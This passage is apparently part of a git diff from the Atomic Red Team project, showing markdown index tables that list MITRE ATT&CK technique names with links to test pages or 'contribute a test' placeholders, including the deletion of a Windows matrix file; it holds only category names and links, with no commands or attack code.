| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | [Office Application Startup](../../T1137/T1137.md) | [Port Monitors](../../T1547.010/T1547.010.md) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Service](../../T1543.002/T1543.002.md) | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Systemd Timers](../../T1053.006/T1053.006.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Startup Items](../../T1037.005/T1037.005.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
| | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Windows Service](../../T1543.003/T1543.003.md) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](../../T1055/T1055.md) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [PubPrn](../../T1216.001/T1216.001.md) | | | | | | | |
| | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | | | [Rootkit](../../T1014/T1014.md) | | | | | | | |
| | | | | Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Rundll32](../../T1218.011/T1218.011.md) | | | | | | | |
| | | | | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | | | | | | | |
| | | | | [Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | | |
| | | | | [Signed Binary Proxy Execution](../../T1218/T1218.md) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | [Software Packing](../../T1027.002/T1027.002.md) | | | | | | | |
| | | | | [Space after Filename](../../T1036.006/T1036.006.md) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | | | | | | | |
| | | | | [System Checks](../../T1497.001/T1497.001.md) | | | | | | | |
| | | | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | |
| | | | | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
atomics/Indexes/Matrices/windows-matrix.md
-122
View File
@@ -1,122 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
